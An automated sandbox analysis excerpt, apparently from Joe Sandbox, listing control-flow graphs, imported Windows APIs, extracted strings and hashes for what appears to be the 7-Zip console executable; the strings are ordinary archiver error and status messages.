                                                                                                                                                                                                                                control_flow_graph 2037 1f5458-1f54e2 2038 1f54e4-1f54f0 2037->2038 2039 1f54f2-1f54f6 2037->2039 2040 1f54fe-1f5504 2038->2040 2039->2040 2041 1f55ec-1f55fd 2040->2041 2042 1f550a 2040->2042 2044 1f55ff-1f560a call 1d2130 2041->2044 2045 1f5612-1f5615 2041->2045 2043 1f550d-1f5538 call 1d7d28 call 1d3208 2042->2043 2058 1f556c-1f559c call 1db8f0 free 2043->2058 2059 1f553a-1f554c call 1d7ebc 2043->2059 2044->2045 2048 1f5617-1f561f memset 2045->2048 2049 1f5624-1f5639 call 1d2130 2045->2049 2048->2049 2056 1f563b-1f563e call 1e3524 2049->2056 2057 1f5648 2049->2057 2066 1f5643-1f5646 2056->2066 2061 1f564b-1f5656 2057->2061 2058->2043 2074 1f55a2 2058->2074 2068 1f5551-1f5554 2059->2068 2062 1f5658-1f5661 2061->2062 2063 1f5662-1f56d1 call 1f43b0 2061->2063 2062->2063 2076 1f56fd-1f5715 2063->2076 2077 1f56d3-1f56e3 2063->2077 2066->2061 2072 1f5556-1f5562 2068->2072 2073 1f55a4-1f55c7 _CxxThrowException 2068->2073 2075 1f55c8-1f55eb _CxxThrowException 2072->2075 2078 1f5564 2072->2078 2073->2075 2074->2041 2075->2041 2079 1f5f1d-1f5f22 2076->2079 2080 1f571b-1f571e 2076->2080 2077->2076 2086 1f56e5-1f56f8 free 2077->2086 2078->2058 2081 1f5f29-1f5f3d 2079->2081 2082 1f5f24-1f5f27 2079->2082 2084 1f5726-1f572a 2080->2084 2094 1f5f3f-1f5f52 free 2081->2094 2095 1f5f54-1f5f67 2081->2095 2082->2081 2085 1f5f8d-1f6002 free * 2 2082->2085 2087 1f5c37-1f5c50 2084->2087 2088 1f5730-1f575f call 1d7d28 call 1d3208 2084->2088 2098 1f6004-1f6017 2085->2098 2099 1f5f7c-1f5f8b free 2086->2099 2087->2084 2090 1f5c56-1f5c5a 2087->2090 2103 1f5772-1f577e call 1d7ebc 2088->2103 2104 1f5761-1f5770 2088->2104 2090->2079 2094->2099 2095->2085 2105 1f5f69-1f5f7b free 2095->2105 2099->2098 2109 1f5783-1f5786 2103->2109 2106 1f579e-1f57b4 call 211544 2104->2106 2105->2099 2113 1f5c5f-1f5c80 free * 2 2106->2113 2114 1f57ba-1f586c call 1f4504 call 1f42a8 call 1f40c4 call 1d3404 call 204c00 2106->2114 2110 1f578c-1f5798 2109->2110 2111 1f5ef9-1f5f1c _CxxThrowException 2109->2111 2110->2106 2110->2111 2111->2079 2113->2099 2126 1f586e-1f5876 2114->2126 2127 1f587d-1f5883 2114->2127 2128 1f5889-1f58b3 call 211bc0 2126->2128 2129 1f5878 2126->2129 2127->2128 2130 1f5c85-1f5c9e free 2127->2130 2136 1f58b9-1f58bc 2128->2136 2137 1f5d02-1f5d1e free 2128->2137 2129->2127 2131 1f5cbe-1f5cfd free call 1f4610 free * 2 2130->2131 2132 1f5ca0 2130->2132 2131->2099 2134 1f5ca4-1f5cbc free 2132->2134 2134->2131 2134->2134 2141 1f58c2-1f58d3 2136->2141 2142 1f59b1-1f59bd 2136->2142 2139 1f5d3e-1f5d7b free call 1f4610 free * 2 2137->2139 2140 1f5d20 2137->2140 2139->2099 2146 1f5d24-1f5d3c free 2140->2146 2148 1f58d5-1f5907 call 1d7d28 call 1d3208 call 1d7ebc 2141->2148 2149 1f5933 2141->2149 2144 1f5a8e-1f5a93 2142->2144 2145 1f59c3-1f59cd 2142->2145 2151 1f5aa1-1f5ab9 2144->2151 2152 1f5a95-1f5a9a 2145->2152 2153 1f59d3-1f59e1 2145->2153 2146->2139 2146->2146 2189 1f5909-1f5915 2148->2189 2190 1f5924-1f5931 free 2148->2190 2155 1f5936-1f594f free 2149->2155 2159 1f5acc 2151->2159 2160 1f5abb-1f5ac3 2151->2160 2152->2151 2157 1f5a55-1f5a58 2153->2157 2158 1f59e3-1f59ed 2153->2158 2161 1f596f-1f59ac free call 1f4610 free 2155->2161 2162 1f5951 2155->2162 2168 1f5a9c 2157->2168 2169 1f5a5a-1f5a86 2157->2169 2164 1f59f5-1f5a11 call 1f4434 2158->2164 2166 1f5acf-1f5b54 call 1f47ac 2159->2166 2160->2159 2165 1f5ac5-1f5aca 2160->2165 2161->2087 2170 1f5955-1f596d free 2162->2170 2181 1f5a13-1f5a15 2164->2181 2182 1f5a21-1f5a30 2164->2182 2165->2166 2183 1f5dfe-1f5e1a free 2166->2183 2184 1f5b5a-1f5b61 2166->2184 2168->2151 2185 1f5a8c 2169->2185 2186 1f5d80-1f5d9c free 2169->2186 2170->2161 2170->2170 2181->2182 2191 1f5a17-1f5a1d 2181->2191 2182->2164 2192 1f5a32-1f5a52 2182->2192 2187 1f5e1c 2183->2187 2188 1f5e3a-1f5e77 free call 1f4610 free * 2 2183->2188 2193 1f5b63-1f5b7e 2184->2193 2194 1f5b80 2184->2194 2185->2151 2195 1f5d9e 2186->2195 2196 1f5dbc-1f5df9 free call 1f4610 free * 2 2186->2196 2197 1f5e20-1f5e38 free 2187->2197 2188->2099 2189->2190 2199 1f5917-1f591f 2189->2199 2190->2155 2191->2182 2192->2157 2200 1f5b88-1f5bb6 2193->2200 2194->2200 2201 1f5da2-1f5dba free 2195->2201 2196->2099 2197->2188 2197->2197 2199->2190 2204 1f5e7c-1f5e95 free 2200->2204 2205 1f5bbc-1f5bd6 free 2200->2205 2201->2196 2201->2201 2207 1f5e97 2204->2207 2208 1f5eb5-1f5ef4 free call 1f4610 free * 2 2204->2208 2209 1f5bff-1f5c12 free call 1f4610 2205->2209 2210 1f5bd8-1f5bdc 2205->2210 2215 1f5e9b-1f5eb3 free 2207->2215 2208->2099 2218 1f5c17-1f5c35 free 2209->2218 2211 1f5bde-1f5bf5 free 2210->2211 2211->2211 2217 1f5bf7 2211->2217 2215->2208 2215->2215 2217->2209 2218->2087
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrow$memset
                                                                                                                                                                                                                                • String ID: can't decompress folder$there is no such archive
                                                                                                                                                                                                                                • API String ID: 4182836161-2069749860
                                                                                                                                                                                                                                • Opcode ID: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                                                • Instruction ID: 934c75cfa3e973a62d665c9d6ae67d23b7482d93eea55f414f1bffbf9ef463ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29526A33209AC486CB24EF25E4843AEB761F79AB94F455122DF9E53B29DF38C855CB00
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c9d507f69cf5efe20d4de7e75527924661c2f100977259353f40b5d9e0ced28d
                                                                                                                                                                                                                                • Instruction ID: 054a8843d0f483835707f154c469ab320af517d9ee66e234d45d924c9354c278
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9d507f69cf5efe20d4de7e75527924661c2f100977259353f40b5d9e0ced28d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8042AF3B219AC486CB24DF25E0946BF7765F79AB88F455016EB5E43B16CF78C88AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Unsupported command:, xrefs: 001E0E57
                                                                                                                                                                                                                                • The command must be specified, xrefs: 001E0DF5
                                                                                                                                                                                                                                • Cannot find archive name, xrefs: 001E110A
                                                                                                                                                                                                                                • -ai switch is not supported for this command, xrefs: 001E15C3
                                                                                                                                                                                                                                • Cannot use absolute pathnames for this command, xrefs: 001E138C
                                                                                                                                                                                                                                • Incorrect Number of benmchmark iterations, xrefs: 001E1847
                                                                                                                                                                                                                                • Unsupported -spf:, xrefs: 001E0F7E
                                                                                                                                                                                                                                • I won't write compressed data to a terminal, xrefs: 001E1741
                                                                                                                                                                                                                                • Only one archive can be created with rename command, xrefs: 001E17E1
                                                                                                                                                                                                                                • Archive name cannot by empty, xrefs: 001E1151
                                                                                                                                                                                                                                • I won't write data and program's messages to same stream, xrefs: 001E14B3, 001E1782
                                                                                                                                                                                                                                • stdout mode and email mode cannot be combined, xrefs: 001E1710
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$free$wcscmp
                                                                                                                                                                                                                                • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
                                                                                                                                                                                                                                • API String ID: 1252877886-1892825451
                                                                                                                                                                                                                                • Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                                                • Instruction ID: c685a178a54e7a970e6642efa50ab05c8e41472b7f266b41fa8f4dce0a2c90cb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3452E273304AC5A7DB29CF2AD5943AEBB61F359744F888026DB9903B12DB78D5B8C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                                • API String ID: 1313864721-2333288578
                                                                                                                                                                                                                                • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                • Instruction ID: 41cf4ce46da1a64c128f820b0cb92381b3c9fc3c63f22caac82500d5ad244356
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3115172204F80E2DA41CB52FE583ADB3A6FBD8B81F940412EA9F42A58CF7CC549C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 001DAC84
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32 ref: 001DAC95
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32 ref: 001DACA9
                                                                                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,001DF928), ref: 001DACE0
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,001DF928), ref: 001DACEA
                                                                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 001DACFA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3398352648-0
                                                                                                                                                                                                                                • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                • Instruction ID: 400d42aee3bb60a65c35cf67ed5124fb3e06efd36999a220a9a9c8b4b77aa89a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B018C7361468187DB50CFA0E9887DA73A1F784B95F944136EB9A82A58CF3CC889CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D794C: FindClose.KERNELBASE ref: 001D795E
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE ref: 001D79BA
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE ref: 001D79FA
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D7A08
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$FileFirstfree$Closememmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2921071498-0
                                                                                                                                                                                                                                • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                • Instruction ID: ee079ebd1b2647b850817852b2078151e5bdad47a55b0ef68495db1cdf40e364
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42211C37208A8086DB21DF24E45039D6361F79A7B8F548322EAB9477D9EF38CA09C701
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                                                                                                                                                                                • API String ID: 0-2438533581
                                                                                                                                                                                                                                • Opcode ID: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                                                • Instruction ID: 8155a8c44fb579847cce83a44eec40ac74944b29d7777258ee080ba5af4c71f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D036132248EC082CB34EB26E4946AEB761F7E5BC4F554112EBAE47B25DF78D985C700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1016 21950d-219510 1017 219a40-219a8e call 1d2130 1016->1017 1018 219516-219529 call 1ded74 1016->1018 1028 219a90-219aa0 call 1d3314 1017->1028 1029 219aa2 1017->1029 1024 219820-219828 1018->1024 1025 21952f-219537 1018->1025 1026 2199e4-2199ee 1024->1026 1027 21982e-21983f call 2178a8 1024->1027 1030 219557-2195d5 call 213230 call 1d3208 1025->1030 1031 219539-219541 1025->1031 1033 219a20-219a3f _CxxThrowException 1026->1033 1034 2199f0-219a1b call 1d2300 fputs * 2 call 1d2300 1026->1034 1048 219841-219845 1027->1048 1049 21984c-21994d call 216990 call 1d2bc8 call 1f7880 call 1d2bc8 call 1d2cdc call 216c04 1027->1049 1038 219aa5-219ac8 call 1db8f0 call 1d2130 1028->1038 1029->1038 1055 2195e5 1030->1055 1056 2195d7-2195df 1030->1056 1031->1030 1037 219543-219552 call 1d3518 1031->1037 1033->1017 1034->1033 1037->1030 1059 219aca-219ada call 1d3314 1038->1059 1060 219adc 1038->1060 1048->1049 1101 219980-2199df free * 5 call 216a20 1049->1101 1102 21994f 1049->1102 1062 2195e8-219631 call 1d3404 call 21780c 1055->1062 1056->1055 1061 2195e1-2195e3 1056->1061 1065 219adf-219c8b call 1db8f0 call 1d2130 1059->1065 1060->1065 1061->1062 1079 219633-219637 1062->1079 1080 21963e-21964d 1062->1080 1091 219c9a 1065->1091 1092 219c8d-219c98 call 217414 1065->1092 1079->1080 1083 219663 1080->1083 1084 21964f-219657 1080->1084 1085 21966b-21972c call 1d3404 call 216990 call 1d2bc8 1083->1085 1084->1083 1088 219659-219661 1084->1088 1119 21972f call 2099b8 1085->1119 1088->1085 1095 219c9d-219ca8 1091->1095 1092->1095 1099 219cb4-219d77 call 1d3404 1095->1099 1100 219caa-219cb3 1095->1100 1115 219d83-219e8a call 2171ec call 1d3404 call 1def70 call 1d3208 call 1f6be0 1099->1115 1116 219d79-219d7d 1099->1116 1100->1099 1113 21a5ad-21a5b5 1101->1113 1105 219953-219969 1102->1105 1111 21997b-21997e 1105->1111 1112 21996b-219976 free * 2 1105->1112 1111->1101 1111->1105 1112->1111 1117 21a5c5-21a5c8 1113->1117 1118 21a5b7-21a5be 1113->1118 1160 219ed2-219f44 call 1f5458 1115->1160 1161 219e8c-219eb4 call 1f6e08 1115->1161 1116->1115 1122 21a5e7-21a603 free 1117->1122 1123 21a5ca-21a5e6 _CxxThrowException 1117->1123 1118->1117 1121 21a5c0 1118->1121 1124 219734-21973f 1119->1124 1126 21a5c0 call 2166a8 1121->1126 1127 21a605 1122->1127 1128 21a626-21a637 free call 1fa13c 1122->1128 1123->1122 1129 219741-21974b call 21b1c8 1124->1129 1130 219750-219798 call 216c04 1124->1130 1126->1117 1132 21a609-21a624 free 1127->1132 1138 21a63c-21a675 call 217080 call 1d182c call 217f50 1128->1138 1129->1130 1142 2197cb-21981b free * 3 call 216a20 free call 21b310 1130->1142 1143 21979a 1130->1143 1132->1128 1132->1132 1162 21a677 1138->1162 1163 21a6a8-21a6c9 free 1138->1163 1142->1113 1144 21979e-2197b4 1143->1144 1149 2197c6-2197c9 1144->1149 1150 2197b6-2197c1 free * 2 1144->1150 1149->1142 1149->1144 1150->1149 1169 219f49-219f53 1160->1169 1161->1160 1172 219eb6-219ed1 _CxxThrowException 1161->1172 1166 21a67b-21a691 1162->1166 1170 21a6a3-21a6a6 1166->1170 1171 21a693-21a69e free * 2 1166->1171 1173 219f60-219f68 1169->1173 1174 219f55-219f5b call 21b1c8 1169->1174 1170->1163 1170->1166 1171->1170 1172->1160 1175 219f6a-219f74 1173->1175 1176 219fbd-219fca 1173->1176 1174->1173 1178 219fb1-219fb9 1175->1178 1179 219f76-219fac call 1d2300 fputs call 1d2300 call 1d2320 call 1d2300 1175->1179 1180 21a02c-21a033 1176->1180 1181 219fcc-219fcf call 1d2300 1176->1181 1178->1176 1179->1178 1183 21a063-21a06a 1180->1183 1184 21a035-21a03a 1180->1184 1190 219fd4-219fdc 1181->1190 1188 21a06c-21a071 1183->1188 1189 21a09e-21a0a1 1183->1189 1184->1183 1187 21a03c-21a05e fputs call 1d26a0 call 1d2300 1184->1187 1187->1183 1192 21a114-21a11b 1188->1192 1195 21a077-21a099 fputs call 1d26a0 call 1d2300 1188->1195 1191 21a0a3-21a0aa 1189->1191 1189->1192 1190->1180 1196 219fde-21a027 fputs call 1d26a0 call 1d2300 fputs call 1d26a0 call 1d2300 1190->1196 1199 21a0d3-21a0da 1191->1199 1200 21a0ac-21a0ce fputs call 1d26a0 call 1d2300 1191->1200 1197 21a11d-21a122 1192->1197 1198 21a15c-21a15f 1192->1198 1195->1189 1196->1180 1207 21a161 1197->1207 1208 21a124-21a133 call 1d2300 1197->1208 1198->1207 1212 21a16c-21a16f 1198->1212 1199->1192 1211 21a0dc-21a0eb call 1d2300 1199->1211 1200->1199 1207->1212 1208->1207 1232 21a135-21a157 fputs call 1d26a0 call 1d2300 1208->1232 1211->1192 1233 21a0ed-21a10f fputs call 1d26a0 call 1d2300 1211->1233 1220 21a320-21a50a free * 2 call 1f6b58 free call 217968 1212->1220 1221 21a175-21a17c 1212->1221 1267 21a53d-21a559 free 1220->1267 1268 21a50c 1220->1268 1228 21a182-21a189 1221->1228 1229 21a2e7-21a2f6 call 1d2300 1221->1229 1228->1229 1235 21a18f-21a192 1228->1235 1229->1220 1245 21a2f8-21a31f fputs call 1d26a0 call 1d2300 1229->1245 1232->1198 1233->1192 1235->1220 1241 21a198-21a1a3 1235->1241 1242 21a1d5-21a1de 1241->1242 1243 21a1a5-21a1cd fputs call 1d26a0 call 1d2300 1241->1243 1250 21a1e0-21a1e3 1242->1250 1251 21a1f3-21a223 fputs call 1d26a0 call 1d2300 1242->1251 1243->1242 1245->1220 1250->1251 1257 21a1e5-21a1ed 1250->1257 1262 21a275-21a2c3 fputs call 1d26a0 call 1d2300 fputs call 1d26a0 call 1d2300 1251->1262 1279 21a225-21a270 fputs call 1d26a0 call 1d2300 fputs call 1d26a0 call 1d2300 1251->1279 1257->1251 1257->1262 1292 21a2c8-21a2cb 1262->1292 1274 21a55b 1267->1274 1275 21a58c-21a599 free 1267->1275 1272 21a510-21a526 1268->1272 1277 21a538-21a53b 1272->1277 1278 21a528-21a533 free * 2 1272->1278 1280 21a55f-21a575 1274->1280 1275->1113 1277->1267 1277->1272 1278->1277 1279->1262 1283 21a587-21a58a 1280->1283 1284 21a577-21a582 free * 2 1280->1284 1283->1275 1283->1280 1284->1283 1292->1220 1294 21a2cd-21a2e5 call 1d2300 call 21291c 1292->1294 1294->1220
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowfputs$fputc
                                                                                                                                                                                                                                • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                                                                                                                                                                                • API String ID: 1639683984-435538426
                                                                                                                                                                                                                                • Opcode ID: bd9f2b28495a3b62c3d481a4c9c43d8556660cff06a10aff3bafa4e3683c7a09
                                                                                                                                                                                                                                • Instruction ID: 709fe9f5b678d17d77485b864e2a850391194b3ad28bbdbe09e1b7697e9dab50
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd9f2b28495a3b62c3d481a4c9c43d8556660cff06a10aff3bafa4e3683c7a09
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09728B72319AC195CA30EF25E4943EEB3A1F7A5B80F444526DAAE43B19DF3CC5A5CB01

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
